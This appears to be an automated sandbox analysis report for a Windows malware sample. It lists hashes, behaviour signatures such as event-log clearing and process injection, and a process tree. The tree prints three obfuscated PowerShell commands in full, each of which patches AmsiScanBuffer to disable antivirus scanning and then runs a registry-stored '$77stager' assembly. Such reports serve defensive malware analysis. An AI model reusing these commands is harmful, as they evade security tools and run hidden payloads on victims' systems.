Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/08/2024, 04:49

General

  • Target

    c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe

  • Size

    9.1MB

  • MD5

    01531f20abdc9491ee999b76a00f9730

  • SHA1

    e1e2acdd11475bea11a686f45a2c626efc1a805b

  • SHA256

    c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775

  • SHA512

    6e2b9e567efe561e0585e9a058d6f0cc80a8e0318688b5ce711eb9fdb63339401b3f6e005e07c8c8623cebef32d168d98cfbc2af71b06feb79ef23d862b793bd

  • SSDEEP

    196608:HTtTdbHLdDEZslzcepY3EDhKRuJZYYE1H/0zRSY:ztTdbHLdDEZs6eMJ4JZY/MzT

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 18 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:64
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{89b0fb13-4320-4db1-8fb9-b19ea916bed8}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:464
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2c213e40-ba0d-4979-866a-3df2564bae6a}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4512
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8ad43860-4f58-44e9-b0e6-b6ba8bf031e0}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{53fed884-f51e-47c5-9084-f5d2464c9806}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d45af44f-1461-47e3-a71c-c23132db97e4}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8e9d673e-f617-4c41-ac70-bb0ffbaf0667}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3552
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8fe09c77-cdf2-47b2-a746-88b68e03cb71}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2c1d2a50-e4dd-4599-936f-1422d93a4c13}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{4402710f-7608-4698-96f0-b99576ef63f8}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4476
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{f81d9152-44d9-44b2-ad3e-0e6352a383ea}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3972
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{619a9716-03d6-4ef9-814c-12e9fea729e6}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{1b9a44b5-605a-4add-b92c-86ba53cc28a7}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4060
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{ff763dfe-e592-42c0-aa27-a74ba55e1ff7}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{f996a3bf-b1a0-4aba-8e50-75b10472becd}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4712
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{b39f74d8-36e5-40e4-a0fb-bdc955bcfcd3}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{b5a40b77-f82e-4253-a996-b25d25eccb26}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{0d0671d2-f408-4ab6-a0ff-2b5d51bd7f63}
        2⤵
          PID:4064
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:664
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:384
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:948
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1040
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1052
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1160
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2472
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QahUKDPOZAWr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sCbgvWMhxOpUiY,[Parameter(Position=1)][Type]$GVONQzPHcU)$cTMOwGPsiNa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Del'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'el'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$cTMOwGPsiNa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+'i'+'a'+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sCbgvWMhxOpUiY).SetImplementationFlags('Run'+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+'a'+'g'+[Char](101)+''+'d'+'');$cTMOwGPsiNa.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+'ke',''+[Char](80)+'ub'+'l'+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](10
8)+''+'o'+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'ua'+'l'+'',$GVONQzPHcU,$sCbgvWMhxOpUiY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');Write-Output $cTMOwGPsiNa.CreateType();}$TasGwiwWxnltl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+'a'+'f'+[Char](101)+''+'N'+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$JSPNhmsQDUsAcN=$TasGwiwWxnltl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$anfpssIgkkgFoYnBygI=QahUKDPOZAWr @([String])([IntPtr]);$xLTyxCDJLqEPmtPhSLjZLU=QahUKDPOZAWr 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MVGsZbReFeF=$TasGwiwWxnltl.GetMethod(''+[Char](71)+''+'e'+'tM'+[Char](111)+'du'+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$ceoRhAgjCTgUty=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$MVGsZbReFeF,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$hFynQeoMRmpIgjpkM=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$MVGsZbReFeF,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+'r'+''+'o'+'t'+[Char](101)+''+'c'+''+'t'+'')));$rddMKbo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ceoRhAgjCTgUty,$anfpssIgkkgFoYnBygI).Invoke(''+'a'+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$buWWlYjpNeeVrcLHZ=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$rddMKbo,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+'a'+'n'+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+'er')));$MsAWqYBZkX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hFynQeoMRmpIgjpkM,$xLTyxCDJLqEPmtPhSLjZLU).Invoke($buWWlYjpNeeVrcLHZ,[uint32]8,4,[ref]$MsAWqYBZkX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$buWWlYjpNeeVrcLHZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hFynQeoMRmpIgjpkM,$xLTyxCDJLqEPmtPhSLjZLU).Invoke($buWWlYjpNeeVrcLHZ,[uint32]8,0x20,[ref]$MsAWqYBZkX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+'A'+'RE').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2640
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CZMwoXAtIHcv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nkUzJQUayWzejE,[Parameter(Position=1)][Type]$srpVAzREsN)$VbZSRWpzWoc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+'c'+'t'+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'gate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+'o'+''+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'D'+'e'+''+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+',S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+'toCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$VbZSRWpzWoc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'ial'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$nkUzJQUayWzejE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+'d');$VbZSRWpzWoc.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+'c,H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+
''+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$srpVAzREsN,$nkUzJQUayWzejE).SetImplementationFlags('R'+'u'+'n'+[Char](116)+'im'+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $VbZSRWpzWoc.CreateType();}$LeudcieQglrmY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+'t'+'i'+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$IlmwamzoNizRLj=$LeudcieQglrmY.GetMethod('Get'+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HjmTVATvhBXyAEewLPu=CZMwoXAtIHcv @([String])([IntPtr]);$WeiYvYnOKoZgliFkTiFuVg=CZMwoXAtIHcv 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$noIloqnXfPq=$LeudcieQglrmY.GetMethod(''+[Char](71)+'e'+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+'a'+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$swAOPAtdAiCmiA=$IlmwamzoNizRLj.Invoke($Null,@([Object]$noIloqnXfPq,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$rWavqAXwOtRCQJJmS=$IlmwamzoNizRLj.Invoke($Null,@([Object]$noIloqnXfPq,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+[Char](116)+'e'+'c'+'t')));$VWwwJai=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($swAOPAtdAiCmiA,$HjmTVATvhBXyAEewLPu).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jHbLaWzIAtdgmIBve=$IlmwamzoNizRLj.Invoke($Null,@([Object]$VWwwJai,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+'f'+''+'e'+''+[Char](114)+'')));$kArItggWID=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rWavqAXwOtRCQJJmS,$WeiYvYnOKoZgliFkTiFuVg).Invoke($jHbLaWzIAtdgmIBve,[uint32]8,4,[ref]$kArItggWID);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jHbLaWzIAtdgmIBve,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rWavqAXwOtRCQJJmS,$WeiYvYnOKoZgliFkTiFuVg).Invoke($jHbLaWzIAtdgmIBve,[uint32]8,0x20,[ref]$kArItggWID);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+'TWA'+[Char](82)+'E').GetValue('$7'+[Char](55)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4468
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:5024
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZsCSpoiCXpme{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lmsXxhmcRcwkVQ,[Parameter(Position=1)][Type]$IPMLAjkswQ)$UxUpviqJXTY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'lect'+[Char](101)+''+[Char](100)+'De'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$UxUpviqJXTY.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$lmsXxhmcRcwkVQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$UxUpviqJXTY.DefineMethod('In'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'Hi'+[Char](100)+'eB'+'y'+''+[Char](83)+''+'i'+''+
'g'+',N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$IPMLAjkswQ,$lmsXxhmcRcwkVQ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+'Ma'+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $UxUpviqJXTY.CreateType();}$zHCkUdBDODbJg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+'m'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+'ti'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$MXBEAUvIkIsQjZ=$zHCkUdBDODbJg.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NyJgIHZMKLSMHUHVwOv=ZsCSpoiCXpme @([String])([IntPtr]);$DzZCfbMIOgvsUJJotECmKI=ZsCSpoiCXpme 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pDFSbaNwdGy=$zHCkUdBDODbJg.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+'2'+'.'+'d'+[Char](108)+'l')));$epJMjhNgxoYcWf=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$pDFSbaNwdGy,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$fAMlMRtcabWytsKeb=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$pDFSbaNwdGy,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+'c'+'t')));$PqWLFdq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($epJMjhNgxoYcWf,$NyJgIHZMKLSMHUHVwOv).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$RSgXQycdMRHgmrJxO=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$PqWLFdq,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$cKzNXgJWAX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fAMlMRtcabWytsKeb,$DzZCfbMIOgvsUJJotECmKI).Invoke($RSgXQycdMRHgmrJxO,[uint32]8,4,[ref]$cKzNXgJWAX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RSgXQycdMRHgmrJxO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fAMlMRtcabWytsKeb,$DzZCfbMIOgvsUJJotECmKI).Invoke($RSgXQycdMRHgmrJxO,[uint32]8,0x20,[ref]$cKzNXgJWAX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'ge'+[Char](114)+'')).E
ntryPoint.Invoke($Null,$Null)"
                          2⤵
